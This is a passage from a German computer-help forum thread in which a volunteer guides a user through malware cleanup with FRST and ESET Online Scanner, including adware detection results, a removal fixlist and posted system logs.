sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe"
sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe"
sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe"
sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe"
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# end=init
# utc_time=2015-09-28 05:34:33
# local_time=2015-09-28 07:34:33 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
esets_scanner_update returned -1 esets_gle=53251
Update Finalize
Updated modules version: 25979
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# end=updated
# utc_time=2015-09-28 05:34:55
# local_time=2015-09-28 07:34:55 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# engine=25979
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2015-09-28 07:33:21
# local_time=2015-09-28 09:33:21 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='AVG Internet Security 2015'
# compatibility_mode=1053 16777213 100 100 492618 130602785 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 483808 195098651 0 0
# scanned=265179
# found=16
# cleaned=0
# scan_time=7105
sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\Uninstall.exe"
sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe"
sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll"
sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll"
sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe"
sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe"
sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe"
sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe"
sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe"
sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe"
sh=C3937102B74AAE33C7725020F68D998A99CD044B ft=1 fh=6e4c94e4e7dedc70 vn="Win32/Somoto.Q evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\nintendo 64\setup_Project64_2.1-2.exe"
sh=3DC4F21FC0E7F3F7D9F790CB87EC114A7C318E02 ft=1 fh=15e73219a331f799 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe"
sh=4931F7FA7A81FDEDA2A91C0E65D6C32EC1284F01 ft=1 fh=ad8674ccbb043117 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe"
sh=F1E5D784B1071F8D5F1E3EAAFE23A70833C46E6F ft=1 fh=af8d05d80c1de300 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\29AF.tmp.exe"
sh=C5B16F532AE1A977A27A8BF74C573823BD510087 ft=1 fh=aff3beb2a54e6882 vn="Variante von Win32/Adware.ConvertAd.WZ.gen Anwendung" ac=I fn="C:\Windows\temp\622C.tmp.exe"
sh=42F595E9602BCC78FAB840104B0EC910C4B7B3C9 ft=1 fh=7ae27ef58399bc29 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\8CA5.tmp.exe"
         

Geändert von Zympop (28.09.2015 um 21:58 Uhr)

Alt 29.09.2015, 09:53   #13
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



===================
Danke für deine Antwort.

Dass dein PC momentan langsam ist oder eine hohe Prozessorauslastung hat, bedeutet nicht unbedingt, dass dein PC infiziert ist.

Auf Grund der mir zur Verfügung stehenden Informationen und Logs, scheint dein Computer mittlerweile frei von aktiver Malware zu sein.

Schritt 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument


Code:
ATTFilter
CloseProcesses:
C:\task.vbs
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe
EmptyTemp:
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.



Hinweis: Chip Installer
Bitte pass auf, wenn du von Chip oder anderen Portalen Software laden möchtest:
Warnung vor Benutzung des Chip-Installers
CHIP-Installer - was ist das? - Anleitungen

Hinweis: Verwendung von Cracks und illegaler Software
Du hast Cracks bzw. illegale Software auf deinem Computer verwendet.
Lese und bedenke dazu folgenden Artikel: http://www.trojaner-board.de/95394-c...-software.html


Schritt 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen


Bitte poste in deiner nächsten Antwort also:
  • Fixlog.txt
  • Frst.txt
  • Addition.txt
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 29.09.2015, 14:11   #14
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Danke für die Antwort

Ja mir fällt sonnst auch nichts mehr auf .Jedoch wundere ich mich wieso der Eset online scan 10-16 sachen gefunden hat. Sollen diese nicht bereinigt werden?

Das mein Computer so langsam geworden ist liegt wohl warscheinlich wirklich an meiner benutzung. Muss ihn halt einfach noch mehr aufräumen.Dir ist soweit keine unnötigen prozesse aufgefallen?

Hier die logs:

Fixlist
Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-29 09:40:54) Run:2
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
C:\task.vbs
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe
EmptyTemp:
*****************

Prozess erfolgreich geschlossen.
C:\task.vbs => erfolgreich verschoben
C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe => erfolgreich verschoben
EmptyTemp: => 968.9 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.. 

==== Ende von Fixlog 09:41:36 ====
         
Addition
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-29 09:51:02)
Gestartet von C:\Users\Kenny G\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-01 16:18:55)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled)
eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot
Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled)
Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G
Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium
UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

888poker (HKLM-x32\...\888poker) (Version:  - )
aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de])
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies)
AVG 2015 (Version: 15.0.4435 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version:  - DICE)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP)
Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com)
Counter-Strike (HKLM-x32\...\Steam App 10) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version:  - CyberGhost S.R.L.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group)
Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.)
Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.)
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ)
iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle)
JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation)
Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 41.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0 (x86 de)) (Version: 41.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.0.5738 - Mozilla)
Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla)
Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version:  - Native Instruments)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments)
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments)
Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version:  - Native Instruments)
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments)
Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version:  - Native Instruments)
NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation)
Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - )
pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA)
Poker 770 (HKLM-x32\...\Poker 770) (Version:  - )
PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version:  - PokerStars.eu)
Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - )
SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version:  - Christian Handorf)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB)
Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TrackMania United (HKLM-x32\...\Steam App 7200) (Version:  - Nadeo)
TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN)
VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd)
Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft)
Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton)
William Hill Poker (HKLM-x32\...\William Hill Poker) (Version:  - )
WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie)
Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie)
Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

23-09-2015 06:34:58 Windows 7 Service Pack 1
27-09-2015 20:53:18 Windows Update
28-09-2015 23:02:53 Installed Microsoft Office Enterprise 2007

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd)
Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated)
Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software)
Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
